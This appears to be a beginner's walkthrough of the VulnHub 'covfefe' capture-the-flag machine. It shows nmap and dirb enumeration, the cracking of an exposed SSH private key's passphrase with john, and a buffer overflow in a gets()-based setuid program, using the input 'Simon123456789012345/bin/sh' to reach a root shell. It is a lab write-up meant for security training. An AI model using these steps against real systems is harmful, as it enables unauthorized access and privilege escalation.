[vulnhub]walkthrough: covfefe

• About

Covfefe is my Debian 9 based B2R VM, originally created as a CTF for SecTalks_BNE. It has three flags. It is intended for beginners and requires enumeration then [spoiler]!

• Walkthrough

  # nmap -v -A -p- 192.168.1.103 -oA scan
  
  

  PORT      STATE SERVICE VERSION
  22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10 (protocol 2.0)
  | ssh-hostkey:
  |   2048 d0:6a:10:e0:fb:63:22:be:09:96:0b:71:6a:60:ad:1a (RSA)
  |   256 ac:2c:11:1e:e2:d6:26:ea:58:c4:3e:2d:3e:1e:dd:96 (ECDSA)
  |_  256 13:b3:db:c5:af:62:c2:b1:60:7d:2f:48:ef:c3:13:fc (EdDSA)
  80/tcp    open  http    nginx 1.10.3
  | http-methods:
  |_  Supported Methods: GET HEAD
  |_http-server-header: nginx/1.10.3
  |_http-title: Welcome to nginx!
  31337/tcp open  http    Werkzeug httpd 0.11.15 (Python 3.5.3)
  | http-robots.txt: 3 disallowed entries
  |_/.bashrc /.profile /taxes
  |_http-title: 404 Not Found

  We see http service on port 80 and 31337. Open dirb and check it.
  
  On port 80 we have 0 found. Better results we have on port 31337:
  
  # dirb http://192.168.1.103:31337
  

  ---- Scanning URL: http://192.168.1.103:31337/ ----
  + http://192.168.1.103:31337/.bash_history (CODE:200|SIZE:430)
  + http://192.168.1.103:31337/.bashrc (CODE:200|SIZE:3526)
  + http://192.168.1.103:31337/.profile (CODE:200|SIZE:675)
  + http://192.168.1.103:31337/.ssh (CODE:200|SIZE:43)
  + http://192.168.1.103:31337/robots.txt (CODE:200|SIZE:70)

  I was download files and look at robots.txt.
  
  

  User-agent: *
  Disallow: /.bashrc
  Disallow: /.profile
  Disallow: /taxes

  I checked out /taxes and I found the first flag flag1{make_america_great_again}
  I checked out all other files and interesting things is in .ssh file.
  
  ['id_rsa', 'authorized_keys', 'id_rsa.pub']
  
  From file authorized_keys we know simon is the user. Also we have id_rsa so let’s connect to the station! # ssh -i id_rsa simon@192.168.1.103 and… we need password :(
  
  We can bruteforce it but we have id_rsa and we could try crack it and found passphrase. ssh2john id_rsa > pass and used john to crack it:
  
  

  john -show sshjohn
  id_rsa:starwars
  
  1 password hash cracked, 0 left
  

  
  Connect to ssh with password starwars Nice, we have this!
  
  

  Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
  
  The programs included with the Debian GNU/Linux system are free software;
  the exact distribution terms for each program are described in the
  individual files in /usr/share/doc/*/copyright.
  
  Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  permitted by applicable law.
  Last login: Fri Dec 22 18:53:36 2017 from 192.168.1.102
  simon@covfefe:~$

  Listing directory and we founded:
  
  

  simon@covfefe:~$ ls -l
  total 12
  -rwxr-xr-x 1 simon simon 449 Jul  9  2017 http_server.py
  -rw-r--r-- 1 simon simon 767 Dec 22 18:58 read_message.c
  -rw-r--r-- 1 simon simon  70 Jul  9  2017 robots.tx

  Ok, remember .bash_history file? So try run this command:  

simon@covfefe:~$ read_message
  

  What is your name?
  Simon
  Hello Simon! Here is your message:
  
  Hi Simon, I hope you like our private messaging system.
  
  I'm really happy with how it worked out!
  
  If you're interested in how it works, I've left a copy of the source code in my home directory.
  
  - Charlie Root
  

  
  Ok, so check the code!
  

  simon@covfefe:~$ cat read_message.c
  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>
  
  // You're getting close! Here's another flag:
  // flag2{use_the_source_luke}
  
  int main(int argc, char *argv[]) {
      char program[] = "/usr/local/sbin/message";
      char buf[20];
      char authorized[] = "Simon";
  
      printf("What is your name?\n");
      gets(buf);
  
      // Only compare first five chars to save precious cycles:
      if (!strncmp(authorized, buf, 5)) {
          printf("Hello %s! Here is your message:\n\n", buf);
          // This is safe as the user can't mess with the binary location:
          execve(program, NULL, NULL);
      } else {
          printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
          exit(EXIT_FAILURE);
      }
  
  }

  First, we have another flag! flag2{use_the_source_luke}
  Second, this look like we need bufferoverflowed this program. We have char buf[20] and we know this - Only compare first five chars to save precious cycles. So name must be Simon. Let’s do this:
  
  

  simon@covfefe:~$ read_message
  What is your name?
  Simon123456789012345/bin/sh
  Hello Simon123456789012345/bin/sh! Here is your message:
  
  # whoami
  root
  #
  
  

  We are root! Good job!
  
  Check what we have in the root dir.
  
  

  # cd /root && ls -la
  total 24
  drwxr-xr-x  2 root root 4096 Jul  9  2017 .
  drwxr-xr-x 21 root root 4096 Jun 28  2017 ..
  -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
  -rw-r--r--  1 root root  148 Aug 18  2015 .profile
  -rw-------  1 root root   75 Jul  9  2017 flag.txt
  -rw-r--r--  1 root root  767 Jul  9  2017 read_message.c

  Get the flag
  
  

  You did it! Congratulations, here's the final flag:

  
  flag3{das_bof_meister}
  

  Good job :>